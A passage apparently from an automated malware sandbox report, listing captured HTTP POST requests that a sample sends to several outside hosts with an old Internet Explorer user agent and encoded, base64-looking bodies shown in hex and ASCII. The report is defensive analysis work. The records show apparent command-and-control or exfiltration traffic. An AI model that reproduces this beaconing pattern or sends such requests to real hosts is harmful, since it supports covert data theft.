71 69 49 41 50 6a 48 62 35 4e 6b 56 34 36 4d 53 31 33 36 30 67 32 45 72 48 39 52 47 48 38 6a 39 71 55 77 39 62 6b 78 66 70 75 56 4b 68 35 57 36 42 74 69 45 35 74 46 41 55 6c 47 4a 2f 64 42 76 6e 56 57 49 45 57 74 68 58 30 4e 42 56 44 6c 4b 62 46 34 58 71 35 33 50 4c 76 4b 67 33 6d 69 53 35 67 33 64 61 32 56 53 6e 44 30 66 52 33 6a 4c 59 75 58 43 78 41 68 6b 57 65 44 2f 59 71 47 66 4b 59 56 42 4c 6a 43 67 53 4d 36 43 73 79 69 37 41 68 35 51 66 44 48 6c 44 33 6c 4c 6f 64 32 35 66 78 44 7a 4b 6b 44 48 41 31 64 43 70 66 34 37 37 4b 64 32 46 73 4f 44 6c 6f 69 5a 48 45 4c 4a 4d 45 69 69 57 69 71 76 59 43 78 58 37 41 70 38 4a 42 47 58 64 6f 30 6c 42 6f 6b 54 36 4f 50 55 64 4d 66 6e 63 52 47 43 4e 37 4c 56 44 73 59 37 30 73 72 34 57 55 43 34 35 32 2b 50 57 69 38 48 67 36 4f 72 78 68 32 53 35 33 52 2b 36 57 7a 42 31 46 55 56 6b 5a 52 6f 53 68 59 62 72 42 76 36 59 30 43 31 69 6f 5a 37 52 4b 44 62 51 67 6e 2f 5a 2f 6f 66 52 58 42 57 Data Ascii: bdxMJFaTEGVha9xfMbJgXPlWBOn2e7oX6sT1h8bYeKzdIvsvWNHMyeT7P8tz8nUuKultevGMxl2wm2rWSQpba0jWAGIoxADEBfh+Zg+yOo23cznil90b5cTQIQDLUgrv+vQvMMMFIvtKgFCfsRUpsCZLslzSre3S1ws/QlvLmHQvBfsTbdrKIFbZe8GJZj1LtKa5CecmlJqkeqEkBeSYM9EJzH0z0rDjBxK69nmRYvx9KxoqCpSQOVEX3csfopfNKRT5C/AekNBG7XBUqXROqiIAPjHb5NkV46MS1360g2ErH9RGH8j9qUw9bkxfpuVKh5W6BtiE5tFAUlGJ/dBvnVWIEWthX0NBVDlKbF4Xq53PLvKg3miS5g3da2VSnD0fR3jLYuXCxAhkWeD/YqGfKYVBLjCgSM6Csyi7Ah5QfDHlD3lLod25fxDzKkDHA1dCpf477Kd2FsODloiZHELJMEiiWiqvYCxX7Ap8JBGXdo0lBokT6OPUdMfncRGCN7LVDsY70sr4WUC452+PWi8Hg6Orxh2S53R+6WzB1FUVkZRoShYbrBv6Y0C1ioZ7RKDbQgn/Z/ofRXBW
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 61 68 6d 79 56 48 44 56 43 57 57 30 33 35 6c 46 67 32 72 70 49 43 4e 53 41 6b 51 59 2b 63 78 76 70 4f 4d 54 6c 38 33 5a 43 5a 6b 64 70 68 4f 50 33 48 4c 2b 33 6e 6a 46 58 31 44 44 5a 61 65 59 49 4f 64 76 54 73 32 6d 57 71 46 4b 4a 69 4c 4a 35 62 61 54 64 4b 47 41 38 52 31 4b 77 70 38 45 43 32 67 42 44 58 7a 70 62 37 4c 42 68 69 30 31 62 62 66 35 77 48 52 69 64 49 6d 61 41 37 38 2b 6b 6f 50 36 61 68 46 6d 49 57 36 6a 6d 77 4f 6b 2f 71 70 66 30 58 59 53 68 54 6c 56 59 4c 54 65 45 75 53 49 4b 30 79 53 75 5a 58 4c 50 5a 52 53 64 42 61 6c 42 45 6b 54 6b 72 6c 65 66 79 2b 47 53 75 49 55 47 4d 41 70 4a 75 48 4d 32 65 76 6e 57 51 31 35 62 54 6e 50 4c 65 52 49 68 70 45 70 65 35 35 65 6d 42 63 68 4f 53 54 4d 52 74 70 4c 4a 74 75 53 4f 53 30 58 4c 57 37 69 6e 77 47 52 54 67 51 74 74 6c 31 30 51 30 6e 42 54 34 42 47 6c 35 31 75 70 4e 78 78 59 7a 47 78 72 2f 45 61 4b 39 2b 49 5a 57 78 37 64 59 57 6d 4f 30 52 4d 70 32 43 46 4e 4b 32 65 4b 4f 33 52 6a 6d 42 50 46 74 4c 2f 4f 31 30 6e 73 78 4b 4c 41 4f 41 69 6e 6e 74 57 6e 63 39 46 38 38 6a 34 4f 62 78 76 51 34 41 53 4b 7a 7a 73 58 45 55 78 2b 45 2f 36 64 39 33 6e 6c 2f 4c 6e 67 4d 63 42 4d 50 6f 2b 49 52 52 46 6d 48 37 55 30 76 74 76 39 47 2f 76 74 78 4c 57 6d 6b 5a 46 64 75 67 75 6d 54 35 54 5a 63 73 6a 57 66 39 37 56 30 68 4b 38 7a 57 63 47 4a 4a 74 44 35 4b 6d 65 72 61 2f 52 79 50 64 41 55 32 63 66 36 63 62 36 56 32 43 49 67 71 35 32 31 75 5a 62 68 6f 79 61 39 71 55 43 58 4c 33 66 64 4f 35 73 30 4c 4a 62 47 4f 48 4d 4a 46 46 41 6b 2b 6a 31 2b 5a 52 6d 4a 41 48 49 6b 77 70 4b 71 62 32 35 59 71 4b 34 53 5a 35 32 63 72 38 46 39 4e 68 35 4a 46 6a 56 58 67 49 4f 55 62 70 57 49 6e 54 32 7a 5a 65 59 66 6b 66 6e 72 41 6c 45 5a 45 3d Data Ascii: ahmyVHDVCWW035lFg2rpICNSAkQY+cxvpOMTl83ZCZkdphOP3HL+3njFX1DDZaeYIOdvTs2mWqFKJiLJ5baTdKGA8R1Kwp8EC2gBDXzpb7LBhi01bbf5wHRidImaA78+koP6ahFmIW6jmwOk/qpf0XYShTlVYLTeEuSIK0ySuZXLPZRSdBalBEkTkrlefy+GSuIUGMApJuHM2evnWQ15bTnPLeRIhpEpe55emBchOSTMRtpLJtuSOS0XLW7inwGRTgQttl10Q0nBT4BGl51upNxxYzGxr/EaK9+IZWx7dYWmO0RMp2CFNK2eKO3RjmBPFtL/O10nsxKLAOAinntWnc9F88j4ObxvQ4ASKzzsXEUx+E/6d93nl/LngMcBMPo+IRRFmH7U0vtv9G/vtxLWmkZFdugumT5TZcsjWf97V0hK8zWcGJJtD5Kmera/RyPdAU2cf6cb6V2CIgq521uZbhoya9qUCXL3fdO5s0LJbGOHMJFFAk+j1+ZRmJAHIkwpKqb25YqK4SZ52cr8F9Nh5JFjVXgIOUbpWInT2zZeYfkfnrAlEZE=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 6c 42 6f 4f 57 57 58 71 49 6d 56 79 71 2b 63 64 44 42 68 32 4c 4e 34 7a 73 66 43 7a 50 52 54 75 61 5a 33 2b 79 39 75 52 43 55 7a 45 6e 4b 73 6a 30 33 32 2f 6a 64 61 42 62 4b 75 58 65 79 30 33 4d 4a 64 79 75 76 71 73 72 4d 4d 4e 6e 4a 67 30 66 79 71 65 39 2b 5a 75 55 44 73 32 69 44 4d 66 72 4c 64 6a 5a 76 74 4a 56 56 61 37 6e 6f 6b 4e 76 45 7a 77 70 45 31 4c 79 69 4d 73 5a 71 51 75 4d 75 39 4e 70 77 54 38 79 61 48 47 71 50 42 31 66 4a 36 52 66 6e 6b 5a 7a 4b 52 4c 6c 33 66 53 65 74 6b 4a 30 41 41 42 7a 78 69 77 54 7a 38 37 65 6f 7a 57 47 39 53 66 79 72 53 56 62 7a 5a 58 4d 7a 6c 5a 62 69 63 62 50 56 35 2f 2f 78 39 73 71 51 39 4a 50 65 68 73 59 45 47 50 39 71 33 6e 54 79 66 32 2f 41 46 4f 75 78 31 41 79 49 43 75 72 57 62 6d 59 34 4d 6b 6b 7a 41 4a 33 4c 7a 79 4e 4a 76 64 74 79 65 68 47 64 72 4b 43 65 36 47 61 6f 61 58 51 39 70 59 66 41 5a 44 72 7a 79 33 43 52 57 4d 32 6b 72 44 35 6c 2b 71 43 48 78 47 6b 67 36 35 51 2b 42 6c 6b 52 69 35 44 4d 6b 2f 2f 6e 52 53 53 53 32 73 4d 78 56 46 4b 30 64 64 66 30 35 70 34 75 32 67 45 56 7a 36 68 5a 4d 6a 39 64 63 32 69 38 47 4e 76 48 41 42 36 71 72 70 63 45 75 79 71 78 38 5a 72 53 39 62 4b 4b 57 4f 4f 78 42 39 34 33 44 44 50 2b 41 4d 58 78 67 59 78 2b 49 67 63 2b 62 64 42 69 73 68 79 77 6e 75 77 71 2b 62 76 2b 48 4e 63 52 54 7a 74 44 75 69 6c 73 5a 70 2b 4e 47 53 74 54 47 63 68 42 71 4f 6e 63 4e 59 44 4d 36 51 4f 64 75 43 70 30 47 44 4a 76 42 7a 31 44 50 6e 30 6a 64 6d 66 35 7a 59 39 54 42 44 44 6b 67 2b 48 33 31 6e 44 2b 4b 70 56 6d 37 4f 4b 49 53 69 4b 59 2b 4c 49 44 76 52 71 50 36 36 58 70 59 39 68 7a 70 2b 45 30 64 5a 75 44 46 58 66 33 75 77 6a 47 56 55 35 66 58 52 63 44 36 4e 30 74 79 70 36 37 35 53 66 49 65 6f 61 2f 31 45 57 42 4e 65 2f 59 76 46 67 33 6d 41 57 2f 36 72 55 51 35 53 67 56 55 3d Data Ascii: lBoOWWXqImVyq+cdDBh2LN4zsfCzPRTuaZ3+y9uRCUzEnKsj032/jdaBbKuXey03MJdyuvqsrMMNnJg0fyqe9+ZuUDs2iDMfrLdjZvtJVVa7nokNvEzwpE1LyiMsZqQuMu9NpwT8yaHGqPB1fJ6RfnkZzKRLl3fSetkJ0AABzxiwTz87eozWG9SfyrSVbzZXMzlZbicbPV5//x9sqQ9JPehsYEGP9q3nTyf2/AFOux1AyICurWbmY4MkkzAJ3LzyNJvdtyehGdrKCe6GaoaXQ9pYfAZDrzy3CRWM2krD5l+qCHxGkg65Q+BlkRi5DMk//nRSSS2sMxVFK0ddf05p4u2gEVz6hZMj9dc2i8GNvHAB6qrpcEuyqx8ZrS9bKKWOOxB943DDP+AMXxgYx+Igc+bdBishywnuwq+bv+HNcRTztDuilsZp+NGStTGchBqOncNYDM6QOduCp0GDJvBz1DPn0jdmf5zY9TBDDkg+H31nD+KpVm7OKISiKY+LIDvRqP66XpY9hzp+E0dZuDFXf3uwjGVU5fXRcD6N0typ675SfIeoa/1EWBNe/YvFg3mAW/6rUQ5SgVU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 78 34 6a 4a 59 35 35 44 49 32 55 44 46 42 2b 4d 36 56 61 59 42 6f 47 57 64 4c 54 65 46 51 56 61 73 70 57 6b 53 55 68 30 69 43 2f 4d 4b 4b 75 4e 68 32 66 70 56 2f 6b 52 4e 45 31 32 45 63 38 55 30 48 2b 6f 4c 4e 6c 37 74 77 4d 70 32 70 51 71 69 5a 4c 77 30 59 35 52 64 42 57 35 55 56 47 49 54 77 6c 37 66 4c 36 77 57 4f 59 59 6d 35 31 32 62 67 70 41 43 45 2b 6e 58 6b 58 61 2f 75 35 41 44 41 58 70 50 46 6c 47 71 6f 4a 4d 35 5a 2f 41 2f 56 65 33 71 39 57 45 73 69 69 4d 67 57 61 73 50 50 46 51 4a 4a 49 45 67 6f 71 6e 4c 4f 7a 52 53 65 48 75 34 43 4b 6e 5a 33 4d 53 30 32 74 44 4a 50 39 6b 66 6d 2b 68 71 58 35 69 39 57 71 53 50 78 6c 32 75 68 47 56 47 6c 79 31 45 66 36 71 54 30 49 6c 33 75 54 4b 53 35 6a 54 41 59 62 54 75 49 6a 64 66 31 65 67 41 70 4d 75 51 4c 4c 58 37 4d 45 62 55 68 72 76 59 4d 61 43 6f 49 64 59 42 44 56 6e 6c 41 5a 67 76 55 45 41 4f 74 75 43 4a 30 6e 53 34 50 46 78 38 62 2b 41 52 43 76 63 58 59 6d 57 6e 41 65 64 70 55 76 58 42 4c 58 74 49 69 4c 59 4c 47 31 5a 66 6d 71 6d 56 37 63 63 54 48 49 5a 64 71 37 62 61 77 6b 30 74 74 59 5a 35 53 35 4d 71 74 77 4e 37 4f 51 4e 2b 6e 49 66 56 68 5a 64 4b 65 67 55 34 48 36 61 38 35 34 6d 35 78 4a 6a 53 33 4e 52 57 46 2b 4f 57 61 43 2f 68 39 38 73 37 34 44 48 54 44 51 55 38 43 4b 4c 46 53 2f 6b 61 74 65 6a 49 4a 4a 58 38 63 37 43 69 58 67 2f 78 71 62 74 6e 33 4d 65 66 65 6f 66 34 69 45 58 58 6f 56 77 36 79 56 54 6b 54 79 4f 49 32 69 57 78 41 76 31 44 2f 77 44 79 31 2b 6f 37 67 70 4e 35 69 30 6f 34 52 39 70 4d 74 4c 4a 56 5a 39 6f 76 52 73 44 37 67 4c 55 6a 71 74 36 62 58 36 31 6e 6a 67 36 39 65 79 2b 70 64 59 74 6b 58 61 41 57 79 4d 33 70 58 30 50 4b 34 79 71 50 73 34 33 38 59 51 33 Data Ascii: x4jJY55DI2UDFB+M6VaYBoGWdLTeFQVaspWkSUh0iC/MKKuNh2fpV/kRNE12Ec8U0H+oLNl7twMp2pQqiZLw0Y5RdBW5UVGITwl7fL6wWOYYm512bgpACE+nXkXa/u5ADAXpPFlGqoJM5Z/A/Ve3q9WEsiiMgWasPPFQJJIEgoqnLOzRSeHu4CKnZ3MS02tDJP9kfm+hqX5i9WqSPxl2uhGVGly1Ef6qT0Il3uTKS5jTAYbTuIjdf1egApMuQLLX7MEbUhrvYMaCoIdYBDVnlAZgvUEAOtuCJ0nS4PFx8b+ARCvcXYmWnAedpUvXBLXtIiLYLG1ZfmqmV7ccTHIZdq7bawk0ttYZ5S5MqtwN7OQN+nIfVhZdKegU4H6a854m5xJjS3NRWF+OWaC/h98s74DHTDQU8CKLFS/katejIJJX8c7CiXg/xqbtn3Mefeof4iEXXoVw6yVTkTyOI2iWxAv1D/wDy1+o7gpN5i0o4R9pMtLJVZ9ovRsD7gLUjqt6bX61njg69ey+pdYtkXaAWyM3pX0PK4yqPs438YQ3
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 6e 42 46 35 6a 6e 32 6d 4a 47 55 46 58 42 58 6a 4e 44 58 57 4f 37 62 2f 72 74 36 72 31 30 63 4c 41 63 38 4c 48 64 4e 4f 6a 65 5a 2f 46 4b 44 70 72 4d 50 6f 67 4a 67 47 63 59 75 4e 4b 4c 6a 34 5a 6a 4a 34 70 58 59 73 62 2b 45 44 35 49 4d 50 4d 63 76 6f 54 50 65 6f 31 69 7a 4a 68 51 75 55 4a 39 63 52 63 36 55 47 4b 64 55 4a 55 6d 33 67 48 5a 61 4e 6e 52 45 74 59 61 53 67 63 46 32 66 59 6c 71 79 6d 38 4c 77 4a 39 4f 6d 75 56 2b 78 33 61 53 41 2b 4e 61 42 50 65 6d 6e 37 2b 62 37 46 62 7a 4b 73 62 57 7a 49 2f 74 36 4b 50 6b 6c 55 65 35 42 58 44 49 78 67 63 69 43 76 66 56 62 4e 34 79 69 70 45 61 37 38 45 43 61 2b 6f 4b 30 46 62 2b 64 2f 6b 54 48 42 36 43 72 48 4b 6a 7a 6e 43 71 33 6a 4d 59 65 7a 38 76 61 41 55 58 7a 54 4a 30 39 56 56 41 2f 76 71 63 56 55 58 4f 73 37 59 48 34 44 4a 67 70 67 61 32 55 73 48 4e 55 38 79 44 6f 34 6d 6d 47 78 6f 71 33 75 6f 6e 61 63 54 4e 38 6b 70 64 46 64 73 76 79 74 6d 33 6e 6f 35 6e 71 52 63 57 35 47 44 47 36 39 45 46 57 77 51 74 57 72 2f 73 51 63 41 73 67 44 4d 4b 59 73 71 43 41 37 55 6e 67 51 73 59 70 79 69 6d 69 5a 68 4f 76 59 75 53 73 7a 43 58 78 64 2f 79 6e 41 58 61 42 74 32 75 74 53 73 76 59 43 6d 34 68 43 57 49 6b 65 48 69 50 6b 77 2b 38 33 41 7a 5a 4a 32 43 62 35 6a 2b 7a 42 32 49 59 68 35 52 62 35 64 78 44 63 4d 59 37 42 45 4f 57 4b 52 42 6d 6a 4e 51 5a 41 55 4d 36 48 77 6c 4e 79 6c 32 78 30 41 7a 77 44 71 5a 59 64 68 48 39 36 45 56 36 51 44 57 35 63 4b 53 6b 5a 4f 6e 5a 54 4f 78 57 62 6c 50 7a 67 4e 74 36 58 53 4d 52 5a 39 50 46 62 36 37 4e 77 49 71 2f 70 73 74 6a 69 34 6e 36 63 55 4f 5a 52 4e 32 4b 44 4c 44 4f 75 2b 46 56 5a 2b 74 53 32 6d 48 55 66 56 2f 49 6e 42 6b 30 63 51 2f 66 6f 69 76 69 34 2f 30 4d 30 69 52 68 53 32 53 71 6b 33 4a 4b 71 52 4c 53 Data Ascii: nBF5jn2mJGUFXBXjNDXWO7b/rt6r10cLAc8LHdNOjeZ/FKDprMPogJgGcYuNKLj4ZjJ4pXYsb+ED5IMPMcvoTPeo1izJhQuUJ9cRc6UGKdUJUm3gHZaNnREtYaSgcF2fYlqym8LwJ9OmuV+x3aSA+NaBPemn7+b7FbzKsbWzI/t6KPklUe5BXDIxgciCvfVbN4yipEa78ECa+oK0Fb+d/kTHB6CrHKjznCq3jMYez8vaAUXzTJ09VVA/vqcVUXOs7YH4DJgpga2UsHNU8yDo4mmGxoq3uonacTN8kpdFdsvytm3no5nqRcW5GDG69EFWwQtWr/sQcAsgDMKYsqCA7UngQsYpyimiZhOvYuSszCXxd/ynAXaBt2utSsvYCm4hCWIkeHiPkw+83AzZJ2Cb5j+zB2IYh5Rb5dxDcMY7BEOWKRBmjNQZAUM6HwlNyl2x0AzwDqZYdhH96EV6QDW5cKSkZOnZTOxWblPzgNt6XSMRZ9PFb67NwIq/pstji4n6cUOZRN2KDLDOu+FVZ+tS2mHUfV/InBk0cQ/foivi4/0M0iRhS2Sqk3JKqRLS
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 6f 41 33 61 61 51 6c 32 49 32 55 4e 67 54 62 6d 57 49 63 6b 42 79 4a 54 48 47 73 6e 62 4a 37 68 54 65 6e 53 44 72 6e 4b 59 61 55 50 54 32 6e 69 69 4e 42 54 54 67 66 52 4f 62 57 39 67 6b 59 71 71 68 4d 30 42 65 4b 66 48 66 4f 42 64 73 53 59 56 66 30 76 4e 53 4b 67 52 6c 69 6f 70 49 77 6a 2f 6d 34 5a 45 34 35 75 4d 4f 62 4a 4c 63 33 57 4b 75 6c 52 4f 7a 64 63 72 54 55 74 39 79 73 76 64 34 6f 42 52 64 2b 6c 6a 38 4b 79 48 72 64 78 4f 35 42 67 64 68 39 56 61 72 4a 7a 78 70 2f 34 38 39 36 57 58 4b 49 48 33 61 50 59 56 49 59 71 4a 7a 78 49 67 7a 35 77 45 31 50 59 46 2f 54 63 36 45 6f 4c 45 73 4b 70 33 4a 2f 6f 77 58 75 43 36 53 5a 49 34 43 51 6f 6b 38 48 4e 69 67 66 6e 71 6e 50 68 31 4a 47 33 68 68 5a 2b 6d 64 6f 38 44 4e 71 44 6b 30 66 79 66 4f 58 66 47 79 43 4a 2b 64 6a 35 79 42 47 36 42 79 4b 4c 6e 6f 4c 2b 65 37 2b 75 65 4f 32 39 6e 67 72 68 4f 65 55 6f 7a 52 4f 32 54 4d 79 53 76 71 7a 2f 6c 76 75 42 69 51 67 31 2f 42 65 57 74 32 56 44 4b 4b 51 61 61 6d 46 73 43 67 39 74 49 75 48 51 41 65 62 63 34 35 61 2b 7a 73 68 51 77 37 55 5a 75 77 63 4a 6f 53 35 67 53 38 46 56 69 54 4d 70 37 4a 46 56 55 49 55 2f 55 4b 65 45 6d 54 70 53 51 45 74 69 49 56 44 49 47 70 4c 74 61 31 6a 6b 66 6e 2b 46 37 6e 52 2f 52 61 6a 72 63 57 7a 6d 2b 4f 75 6a 6e 75 74 50 57 36 33 4a 48 2b 41 6a 56 54 5a 4e 2b 73 71 77 78 50 41 79 7a 51 35 5a 6e 58 30 72 54 65 6f 4b 5a 73 34 56 6a 6c 58 7a 43 36 51 77 6a 74 71 52 6d 56 6c 7a 54 2f 39 48 41 68 65 6b 48 6f 4c 2b 79 39 66 55 4d 42 65 43 69 35 53 37 68 6b 39 53 77 35 5a 37 4d 39 71 52 65 48 72 77 78 47 34 62 5a 77 4b 76 6e 2b 6f 45 6a 30 42 30 68 67 5a 7a 4d 2f 41 4b 34 59 39 30 64 2b 41 37 2b 51 56 47 63 68 42 6a 67 6e 71 6f 47 70 49 3d Data Ascii: oA3aaQl2I2UNgTbmWIckByJTHGsnbJ7hTenSDrnKYaUPT2niiNBTTgfRObW9gkYqqhM0BeKfHfOBdsSYVf0vNSKgRliopIwj/m4ZE45uMObJLc3WKulROzdcrTUt9ysvd4oBRd+lj8KyHrdxO5Bgdh9VarJzxp/4896WXKIH3aPYVIYqJzxIgz5wE1PYF/Tc6EoLEsKp3J/owXuC6SZI4CQok8HNigfnqnPh1JG3hhZ+mdo8DNqDk0fyfOXfGyCJ+dj5yBG6ByKLnoL+e7+ueO29ngrhOeUozRO2TMySvqz/lvuBiQg1/BeWt2VDKKQaamFsCg9tIuHQAebc45a+zshQw7UZuwcJoS5gS8FViTMp7JFVUIU/UKeEmTpSQEtiIVDIGpLta1jkfn+F7nR/RajrcWzm+OujnutPW63JH+AjVTZN+sqwxPAyzQ5ZnX0rTeoKZs4VjlXzC6QwjtqRmVlzT/9HAhekHoL+y9fUMBeCi5S7hk9Sw5Z7M9qReHrwxG4bZwKvn+oEj0B0hgZzM/AK4Y90d+A7+QVGchBjgnqoGpI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 46 56 2f 6e 61 73 64 2b 49 32 55 2f 2b 69 2f 57 39 71 30 75 35 5a 42 63 31 6d 6d 39 37 69 68 43 36 78 61 49 35 67 44 50 2f 38 42 32 4c 52 4e 75 34 45 46 45 30 4e 7a 75 61 71 68 59 6e 4c 63 6d 6e 2b 50 50 63 69 30 70 44 38 67 41 39 33 6b 78 42 33 31 65 4c 75 4f 4e 64 46 53 52 38 46 57 43 62 32 49 57 2f 56 4a 48 2b 54 4b 66 63 41 72 46 35 75 59 78 62 6b 61 58 6c 76 67 4c 63 61 61 6d 73 37 49 79 70 55 57 62 59 54 39 68 39 65 31 59 46 59 69 67 48 69 66 48 4a 74 49 67 4a 52 58 46 33 54 54 32 77 32 44 52 38 53 78 69 77 33 73 43 62 74 31 74 70 69 6c 55 52 36 6a 46 4c 59 66 4f 65 6c 69 6c 35 4e 70 6b 63 31 61 36 51 51 73 36 64 35 63 48 4c 49 44 33 31 58 36 2b 2b 6e 35 63 2b 79 53 36 46 6a 74 4a 5a 74 37 59 65 68 44 4a 44 2b 68 6e 6c 34 4e 4b 2f 68 48 58 47 32 7a 32 75 50 42 31 39 70 2f 50 39 34 42 38 6e 7a 47 34 64 6b 38 5a 66 6a 53 32 31 50 53 7a 4d 63 45 45 6d 36 7a 4e 4b 37 4a 78 4d 4d 74 30 62 69 62 65 68 4d 37 36 44 30 79 4c 55 34 65 34 75 50 4e 50 41 2b 61 62 34 4d 37 31 43 4d 74 4d 54 51 51 31 79 33 46 46 39 57 5a 49 4e 71 58 47 79 6c 73 4b 43 73 35 68 4e 73 47 75 69 78 65 48 4a 69 39 79 6c 43 77 42 39 6d 39 4a 51 35 2f 46 38 4b 79 31 73 4b 37 52 35 70 62 69 46 4d 42 41 5a 69 39 42 4c 31 35 73 33 71 37 39 32 53 70 53 6c 47 62 38 2b 6a 47 44 73 74 6e 6c 64 46 65 6c 31 47 6f 47 57 57 58 51 57 72 45 34 41 63 58 4a 49 56 4e 41 63 6e 71 4d 42 2f 71 62 6d 36 6c 50 32 4e 4f 6e 71 61 48 2f 6a 4d 7a 48 6c 32 32 30 66 79 75 34 43 34 61 52 74 76 51 4c 38 30 4c 75 42 6c 42 36 66 46 56 37 32 74 48 55 49 73 6c 68 39 43 36 42 46 63 70 75 7a 38 63 2f 5a 71 43 68 36 2b 50 4c 6f 66 73 2b 6e 38 6d 45 6f 33 75 73 4e 42 36 36 37 31 7a 44 2f 53 31 73 31 4e 61 72 34 47 7a 44 46 75 50 52 59 65 33 62 6c 6a 4c 51 34 4e 69 77 6e 67 3d 3d Data Ascii: FV/nasd+I2U/+i/W9q0u5ZBc1mm97ihC6xaI5gDP/8B2LRNu4EFE0NzuaqhYnLcmn+PPci0pD8gA93kxB31eLuONdFSR8FWCb2IW/VJH+TKfcArF5uYxbkaXlvgLcaams7IypUWbYT9h9e1YFYigHifHJtIgJRXF3TT2w2DR8Sxiw3sCbt1tpilUR6jFLYfOelil5Npkc1a6QQs6d5cHLID31X6++n5c+yS6FjtJZt7YehDJD+hnl4NK/hHXG2z2uPB19p/P94B8nzG4dk8ZfjS21PSzMcEEm6zNK7JxMMt0bibehM76D0yLU4e4uPNPA+ab4M71CMtMTQQ1y3FF9WZINqXGylsKCs5hNsGuixeHJi9ylCwB9m9JQ5/F8Ky1sK7R5pbiFMBAZi9BL15s3q792SpSlGb8+jGDstnldFel1GoGWWXQWrE4AcXJIVNAcnqMB/qbm6lP2NOnqaH/jMzHl220fyu4C4aRtvQL80LuBlB6fFV72tHUIslh9C6BFcpuz8c/ZqCh6+PLofs+n8mEo3usNB6671zD/S1s1Nar4GzDFuPRYe3bljLQ4Niwng==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 6e 42 46 35 6a 6e 32 6d 4a 47 55 46 58 42 58 6a 4e 44 58 57 4f 37 62 2f 72 74 36 72 31 30 63 4c 41 63 38 4c 48 64 4e 4f 6a 65 5a 2f 46 4b 44 70 72 4d 50 6f 67 4a 67 47 63 59 75 4e 4b 4c 6a 34 5a 6a 4a 34 70 58 59 73 62 2b 45 44 35 49 4d 50 4d 63 76 6f 54 50 65 6f 31 69 7a 4a 68 51 75 55 4a 39 63 52 63 36 55 47 4b 64 55 4a 55 6d 33 67 48 5a 61 4e 6e 52 45 74 59 61 53 67 63 46 32 66 59 6c 71 79 6d 38 4c 77 4a 39 4f 6d 75 56 2b 78 33 61 53 41 2b 4e 61 42 50 65 6d 6e 37 2b 62 37 46 62 7a 4b 73 62 57 7a 49 2f 74 36 4b 50 6b 6c 55 65 35 42 58 44 49 78 67 63 69 43 76 66 56 62 4e 34 79 69 70 45 61 37 38 45 43 61 2b 6f 4b 30 46 62 2b 64 2f 6b 54 48 42 36 43 72 48 4b 6a 7a 6e 43 71 33 6a 4d 59 65 7a 38 76 61 41 55 58 7a 54 4a 30 39 56 56 41 2f 76 71 63 56 55 58 4f 73 37 59 48 34 44 4a 67 70 67 61 32 55 73 48 4e 55 38 79 44 6f 34 6d 6d 47 78 6f 71 33 75 6f 6e 61 63 54 4e 38 6b 70 64 46 64 73 76 79 74 6d 33 6e 6f 35 6e 71 52 63 57 35 47 44 47 36 39 45 46 57 77 51 74 57 72 2f 73 51 63 41 73 67 44 4d 4b 59 73 71 43 41 37 55 6e 67 51 73 59 70 79 69 6d 69 5a 68 4f 76 59 75 53 73 7a 43 58 78 64 2f 79 6e 41 58 61 42 74 32 75 74 53 73 76 59 43 6d 34 68 43 57 49 6b 65 48 69 50 6b 77 2b 38 33 41 7a 5a 4a 32 43 62 35 6a 2b 7a 42 32 49 59 68 35 52 62 35 64 78 44 63 4d 59 37 42 45 4f 57 4b 52 42 6d 6a 4e 51 5a 41 55 4d 36 48 77 6c 4e 79 6c 32 78 30 41 7a 77 44 71 5a 59 64 68 48 39 36 45 56 36 51 44 57 35 63 4b 53 6b 5a 4f 6e 5a 54 4f 78 57 62 6c 50 7a 67 4e 74 36 58 53 4d 52 5a 39 50 46 62 36 37 4e 77 49 71 2f 70 73 74 6a 69 34 6e 36 63 55 4f 5a 52 4e 32 4b 44 4c 44 4f 75 2b 46 56 5a 2b 74 53 32 6d 48 55 66 56 2f 49 6e 42 6b 30 63 51 2f 66 6f 69 76 69 34 2f 30 4d 30 69 52 68 53 32 53 71 6b 33 4a 4b 71 52 4c 53 Data Ascii: 